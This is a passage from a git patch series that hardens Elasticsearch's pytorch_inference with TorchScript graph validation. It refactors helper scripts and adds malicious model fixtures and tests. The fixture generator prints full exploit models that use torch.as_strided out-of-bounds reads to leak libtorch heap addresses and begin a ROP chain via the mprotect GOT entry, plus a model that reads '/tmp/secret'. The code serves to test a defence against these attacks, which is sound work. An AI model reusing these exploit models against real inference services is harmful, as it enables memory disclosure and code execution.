collect_graph_ops(graph) - - def extract_ops_for_model(model_name: str) -> set[str] | None: """Trace a HuggingFace model and return its TorchScript op set. Returns None if the model could not be loaded or traced. """ print(f" Loading {model_name}...", file=sys.stderr) - token = os.environ.get("HF_TOKEN") - - try: - tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) - config = AutoConfig.from_pretrained(model_name, torchscript=True, token=token) - model = AutoModel.from_pretrained(model_name, config=config, token=token) - model.eval() - except Exception as e: - print(f" Error: failed to load {model_name}: {e}", file=sys.stderr) + traced = load_and_trace_hf_model(model_name) + if traced is None: return None - - inputs = tokenizer("This is a sample input for graph extraction.", - return_tensors="pt", padding="max_length", - max_length=32, truncation=True) - - input_ids = inputs["input_ids"] - attention_mask = inputs["attention_mask"] - - try: - traced = torch.jit.trace(model, (input_ids, attention_mask), strict=False) - except Exception as e: - print(f" Warning: trace failed for {model_name}: {e}", file=sys.stderr) - print(f" Falling back to torch.jit.script...", file=sys.stderr) - try: - traced = torch.jit.script(model) - except Exception as e2: - print(f" Error: script also failed for {model_name}: {e2}", - file=sys.stderr) - return None - - return collect_all_module_ops(traced) + return collect_inlined_ops(traced) def format_cpp_initializer(ops: set[str]) -> str: diff --git a/dev-tools/extract_model_ops/torchscript_utils.py b/dev-tools/extract_model_ops/torchscript_utils.py new file mode 100644 index 000000000..7ad860b58 --- /dev/null +++ b/dev-tools/extract_model_ops/torchscript_utils.py @@ -0,0 +1,74 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Shared utilities for extracting and inspecting TorchScript operations.""" + +import os +import sys + +import torch +from transformers import AutoConfig, AutoModel, AutoTokenizer + + +def collect_graph_ops(graph) -> set[str]: + """Collect all operation names from a TorchScript graph, including blocks.""" + ops = set() + for node in graph.nodes(): + ops.add(node.kind()) + for block in node.blocks(): + ops.update(collect_graph_ops(block)) + return ops + + +def collect_inlined_ops(module) -> set[str]: + """Clone the forward graph, inline all calls, and return the op set.""" + graph = module.forward.graph.copy() + torch._C._jit_pass_inline(graph) + return collect_graph_ops(graph) + + +def load_and_trace_hf_model(model_name: str): + """Load a HuggingFace model, tokenize sample input, and trace to TorchScript. + + Returns the traced module, or None if the model could not be loaded or traced. + """ + token = os.environ.get("HF_TOKEN") + + try: + tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) + config = AutoConfig.from_pretrained( + model_name, torchscript=True, token=token) + model = AutoModel.from_pretrained( + model_name, config=config, token=token) + model.eval() + except Exception as exc: + print(f" LOAD ERROR: {exc}", file=sys.stderr) + return None + + inputs = tokenizer( + "This is a sample input for graph extraction.", + return_tensors="pt", padding="max_length", + max_length=32, truncation=True) + + input_ids = inputs["input_ids"] + attention_mask = inputs["attention_mask"] + + try: + return torch.jit.trace( + model, (input_ids, attention_mask), strict=False) + except Exception as exc: + print(f" TRACE WARNING: {exc}", file=sys.stderr) + print(" Falling back to torch.jit.script...", file=sys.stderr) + try: + return torch.jit.script(model) + except Exception as exc2: + print(f" SCRIPT ERROR: {exc2}", file=sys.stderr) + return None diff --git a/dev-tools/extract_model_ops/validate_allowlist.py b/dev-tools/extract_model_ops/validate_allowlist.py index b7d4ef49d..5d31d44bf 100644 --- a/dev-tools/extract_model_ops/validate_allowlist.py +++ b/dev-tools/extract_model_ops/validate_allowlist.py @@ -30,13 +30,17 @@ import argparse import json -import os import re import sys from pathlib import Path import torch -from transformers import AutoConfig, AutoModel, AutoTokenizer + +from torchscript_utils import ( + collect_graph_ops, + collect_inlined_ops, + load_and_trace_hf_model, +) SCRIPT_DIR = Path(__file__).resolve().parent REPO_ROOT = SCRIPT_DIR.parents[1] @@ -62,66 +66,11 @@ def load_cpp_sets() -> tuple[set[str], set[str]]: return allowed, forbidden -def collect_graph_ops(graph) -> set[str]: - """Collect all operation names from a TorchScript graph, including blocks.""" - ops = set() - for node in graph.nodes(): - ops.add(node.kind()) - for block in node.blocks(): - ops.update(collect_graph_ops(block)) - return ops - - -def trace_and_collect_ops(model_name: str) -> set[str] | None: - """Load, trace, inline, and return the op set for a HuggingFace model. - - Returns None if the model could not be loaded or traced. - """ - token = os.environ.get("HF_TOKEN") - - try: - tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) - config = AutoConfig.from_pretrained( - model_name, torchscript=True, token=token) - model = AutoModel.from_pretrained( - model_name, config=config, token=token) - model.eval() - except Exception as exc: - print(f" LOAD ERROR: {exc}", file=sys.stderr) - return None - - inputs = tokenizer( - "This is a sample input for graph extraction.", - return_tensors="pt", padding="max_length", - max_length=32, truncation=True) - - input_ids = inputs["input_ids"] - attention_mask = inputs["attention_mask"] - - try: - traced = torch.jit.trace( - model, (input_ids, attention_mask), strict=False) - except Exception as exc: - print(f" TRACE WARNING: {exc}", file=sys.stderr) - print(" Falling back to torch.jit.script...", file=sys.stderr) - try: - traced = torch.jit.script(model) - except Exception as exc2: - print(f" SCRIPT ERROR: {exc2}", file=sys.stderr) - return None - - graph = traced.forward.graph.copy() - torch._C._jit_pass_inline(graph) - return collect_graph_ops(graph) - - def load_pt_and_collect_ops(pt_path: str) -> set[str] | None: """Load a saved TorchScript .pt file, inline, and return its op set.""" try: module = torch.jit.load(pt_path) - graph = module.forward.graph.copy() - torch._C._jit_pass_inline(graph) - return collect_graph_ops(graph) + return collect_inlined_ops(module) except Exception as exc: print(f" LOAD ERROR: {exc}", file=sys.stderr) return None @@ -157,10 +106,11 @@ def validate_model(model_name: str, verbose: bool) -> bool: """Validate one HuggingFace model. Returns True if all ops pass.""" print(f" {model_name}...", file=sys.stderr) - ops = trace_and_collect_ops(model_name) - if ops is None: + traced = load_and_trace_hf_model(model_name) + if traced is None: print(f" FAILED (could not load/trace)", file=sys.stderr) return False + ops = collect_inlined_ops(traced) return check_ops(ops, allowed, forbidden, verbose) From fb287349aed582cd47ed5560a130cd52cf3b87a6 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 3 Mar 2026 17:26:16 +1300 Subject: [PATCH 23/30] [ML] Use CStringUtils::join for operation list formatting in Main.cc Made-with: Cursor --- bin/pytorch_inference/Main.cc | 16 ++-------------- 1 file changed, 2 insertions(+), 14 deletions(-) diff --git a/bin/pytorch_inference/Main.cc b/bin/pytorch_inference/Main.cc index 9915f2f59..0ed6980f1 100644 --- a/bin/pytorch_inference/Main.cc +++ b/bin/pytorch_inference/Main.cc @@ -48,24 +48,12 @@ void verifySafeModel(const torch::jit::script::Module& module_) { auto result = ml::torch::CModelGraphValidator::validate(module_); if (result.s_ForbiddenOps.empty() == false) { - std::string ops; - for (const auto& op : result.s_ForbiddenOps) { - if (ops.empty() == false) { - ops += ", "; - } - ops += op; - } + std::string ops = ml::core::CStringUtils::join(result.s_ForbiddenOps, ", "); HANDLE_FATAL(<< "Model contains forbidden operations: " << ops); } if (result.s_UnrecognisedOps.empty() == false) { - std::string ops; - for (const auto& op : result.s_UnrecognisedOps) { - if (ops.empty() == false) { - ops += ", "; - } - ops += op; - } + std::string ops = ml::core::CStringUtils::join(result.s_UnrecognisedOps, ", "); HANDLE_FATAL(<< "Model graph does not match any supported architecture. " << "Unrecognised operations: " << ops); } From 3cf1522ff1cb80b273a55c179dccea2105052ec7 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 10 Mar 2026 09:39:53 +1300 Subject: [PATCH 24/30] Add CHANGELOG entry for TorchScript model graph validation Made-with: Cursor --- docs/CHANGELOG.asciidoc | 1 + 1 file changed, 1 insertion(+) diff --git a/docs/CHANGELOG.asciidoc b/docs/CHANGELOG.asciidoc index fa2d53225..b4fd92daa 100644 --- a/docs/CHANGELOG.asciidoc +++ b/docs/CHANGELOG.asciidoc @@ -32,6 +32,7 @@ === Enhancements +* Harden pytorch_inference with TorchScript model graph validation. (See {ml-pull}[#2936].) * Better handling of invalid JSON state documents (See {ml-pull}[]#2895].) * Better error handling regarding quantiles state documents (See {ml-pull}[#2894]) From 86c53008ca3917a1836cb58b4a7c194d043b995c Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Wed, 11 Mar 2026 10:51:36 +1300 Subject: [PATCH 25/30] [ML] Add sandbox2 attack model fixtures and C++ test cases Add HeapLeakModel and RopExploitModel (from PR #2873) to the malicious model fixture generator and create corresponding .pt test fixtures. These reproduce real-world attacks that exploit torch.as_strided to leak heap addresses and build ROP chains. Add two new Boost.Test cases in CModelGraphValidatorTest that load these fixtures and verify the graph validator rejects them due to unrecognised operations (aten::as_strided, aten::item). Made-with: Cursor --- .../unittest/CModelGraphValidatorTest.cc | 34 ++++++ .../testfiles/generate_malicious_models.py | 111 ++++++++++++++++++ .../malicious_models/malicious_heap_leak.pt | Bin 0 -> 4623 bytes .../malicious_models/malicious_rop_exploit.pt | Bin 0 -> 6109 bytes 4 files changed, 145 insertions(+) create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_heap_leak.pt create mode 100644 bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_rop_exploit.pt diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index 595509ee0..8a9b89fbe 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -401,4 +401,38 @@ BOOST_AUTO_TEST_CASE(testMaliciousFileReaderInSubmodule) { BOOST_REQUIRE(hasForbiddenOp(result, "aten::from_file")); } +// --- Sandbox2 attack models (PR #2873) --- +// +// These reproduce real-world attack vectors that exploit torch.as_strided +// to read out-of-bounds heap memory, leak libtorch addresses, and build +// ROP chains that call mprotect + shellcode to write arbitrary files. +// The graph validator must reject them because aten::as_strided (and +// several helper ops like aten::item) are not in the allowlist. + +BOOST_AUTO_TEST_CASE(testMaliciousHeapLeak) { + // A model that uses torch.as_strided with a malicious storage offset + // to scan the heap for libtorch pointers and leak their addresses + // via an assertion message. + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_heap_leak.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::as_strided")); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::item")); +} + +BOOST_AUTO_TEST_CASE(testMaliciousRopExploit) { + // A model that extends the heap-leak technique to overwrite function + // pointers and build a ROP chain: mprotect a heap page as executable, + // then jump to shellcode that writes files to disk. + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_rop_exploit.pt"); + auto result = CModelGraphValidator::validate(module); + + BOOST_REQUIRE(result.s_IsValid == false); + BOOST_REQUIRE(result.s_ForbiddenOps.empty()); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::as_strided")); + BOOST_REQUIRE(hasUnrecognisedOp(result, "aten::item")); +} + BOOST_AUTO_TEST_SUITE_END() diff --git a/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py b/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py index 45549770b..67a053c38 100644 --- a/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py +++ b/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py @@ -106,6 +106,115 @@ def forward(self, x: Tensor) -> Tensor: return torch.from_file("/tmp/secret", size=10) +# --- Sandbox2 attack models (PR #2873) --- +# +# These reproduce real-world attack vectors that exploit torch.as_strided +# to leak heap addresses and build ROP chains. The graph validator must +# reject them because as_strided (and several helper ops) are not in the +# transformer-architecture allowlist. + + +class HeapLeakModel(torch.nn.Module): + """Leaks heap addresses via torch.as_strided with a malicious storage offset. + + The attack scans the heap for libtorch pointers by reading out-of-bounds + memory through a strided view. Key unrecognised ops: aten::as_strided, + aten::item, aten::__rshift__. + """ + def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: + evil_length = 0x900 * 8 + leak = torch.as_strided( + tensors, [evil_length], [1], 2305843009213693952 - evil_length) + index: list[int] = [-1] + for i in range(evil_length - 1 - 5, -1, -1): + if (leak[i + 3].item() == leak[i + 5].item() + and leak[i + 3].item() >> 40 == 127): + if (leak[i + 2].item() >= 0x100000000 + and leak[i + 2].item() <= 0x100000005): + index.append(i) + return (index, leak) + + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + tmp: list[Tensor] = [] + heap_len = 200 + array_len = 0x900 + for i in range(heap_len): + tmp_values = [0xdead00000 + i] + [ + 0xdead00000 + j for j in range(2, array_len)] + tmp.append(torch.tensor(tmp_values)) + for i in range(heap_len): + indexs, leak = self.find_heap_overlap(tmp[i]) + indexs = indexs[1:] + if indexs == []: + continue + for index in indexs: + heap_addr = leak[index + 3].item() + libtorch_python_addr = leak[index + 1].item() + libtorch_cpu_addr = libtorch_python_addr - 0xc878b50 + assert 1 == 0, "leak: " + hex(libtorch_cpu_addr) + for i in range(heap_len): + print(tmp[i].shape) + return torch.zeros(0) + + +class RopExploitModel(torch.nn.Module): + """Builds a ROP chain to mprotect heap memory and execute shellcode. + + Extends the heap-leak technique to overwrite function pointers and + chain gadgets that call mprotect followed by attacker-controlled + shellcode that writes files to disk. Key unrecognised ops: + aten::as_strided, aten::copy_, aten::Delete. + """ + def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: + evil_length = 0x900 * 8 + leak = torch.as_strided( + tensors, [evil_length], [1], 2305843009213693952 - evil_length) + index: list[int] = [-1] + for i in range(evil_length - 1 - 5, -1, -1): + if (leak[i + 3].item() == leak[i + 5].item() + and leak[i + 3].item() >> 40 == 127): + if (leak[i + 2].item() >= 0x100000000 + and leak[i + 2].item() <= 0x100000005): + index.append(i) + return (index, leak) + + def get_address_data(self, leak: Tensor, index: int, + tmp: list[Tensor], target_addr: int) -> int: + leak[index] = target_addr + return int(tmp[0].item()) + + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + tmp: list[Tensor] = [] + heap_len = 200 + array_len = 0x900 + for i in range(heap_len): + tmp_values = [0xdead00000 + i] + [ + 0xdead00000 + j for j in range(2, array_len)] + tmp.append(torch.tensor(tmp_values)) + for i in range(heap_len): + indexs, leak = self.find_heap_overlap(tmp[i]) + indexs = indexs[1:] + if indexs == []: + continue + for index in indexs: + heap_addr = leak[index + 3].item() + libtorch_python_addr = leak[index + 1].item() + libtorch_cpu_addr = libtorch_python_addr - 0xc878b50 + leak[index + 3] = int(heap_addr - 0x8) + for j in range(heap_len): + if tmp[j][2].item() == 0xDEAD00002 and i != j: + mprotect_got_addr = 0xc9785f0 + libtorch_cpu_addr + self.get_address_data( + leak, index + 3, tmp[j:j + 1], + int(mprotect_got_addr)) + del tmp[j] + assert 1 == 0, "exploit" + return torch.zeros(0) + for i in range(heap_len): + print(tmp[i].shape) + return torch.zeros(0) + + # --- Generation logic --- @@ -116,6 +225,8 @@ def forward(self, x: Tensor) -> Tensor: "malicious_conditional.pt": ConditionalMalicious, "malicious_many_unrecognised.pt": ManyUnrecognisedOps, "malicious_file_reader_in_submodule.pt": FileReaderInSubmodule, + "malicious_heap_leak.pt": HeapLeakModel, + "malicious_rop_exploit.pt": RopExploitModel, } diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_heap_leak.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_heap_leak.pt new file mode 100644 index 0000000000000000000000000000000000000000..3458ab76a4d5f7e16a372d7f7f9a4259e5b88c23 GIT binary patch literal 4623 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 literal 0 HcmV?d00001 diff --git a/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_rop_exploit.pt b/bin/pytorch_inference/unittest/testfiles/malicious_models/malicious_rop_exploit.pt new file mode 100644 index 0000000000000000000000000000000000000000..08beafc14cef417a5abf4b2585832b5d09dc427b GIT binary patch literal 6109 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 Date: Wed, 11 Mar 2026 11:04:05 +1300 Subject: [PATCH 26/30] [ML] Add Python test scripts for sandbox2 attack model validation Add two standalone Python test scripts alongside the existing fixture generator in bin/pytorch_inference/unittest/testfiles/: - test_graph_validation_evil_models.py: Pure-Python test that mirrors CModelGraphValidator logic (allowlist, forbidden list, recursive block traversal, graph inlining) and validates that the sandbox2 attack models are rejected. Useful for fast iteration during allowlist development without requiring a C++ build. - test_pytorch_inference_evil_models.py: End-to-end integration test that generates evil models, wraps them in the CBufferedIStreamAdapter size-prefixed framing format, and invokes the actual pytorch_inference binary to confirm graph validation rejection. Made-with: Cursor --- .../test_graph_validation_evil_models.py | 416 ++++++++++++++++ .../test_pytorch_inference_evil_models.py | 467 ++++++++++++++++++ 2 files changed, 883 insertions(+) create mode 100644 bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py create mode 100644 bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py diff --git a/bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py b/bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py new file mode 100644 index 000000000..cb855f32f --- /dev/null +++ b/bin/pytorch_inference/unittest/testfiles/test_graph_validation_evil_models.py @@ -0,0 +1,416 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license 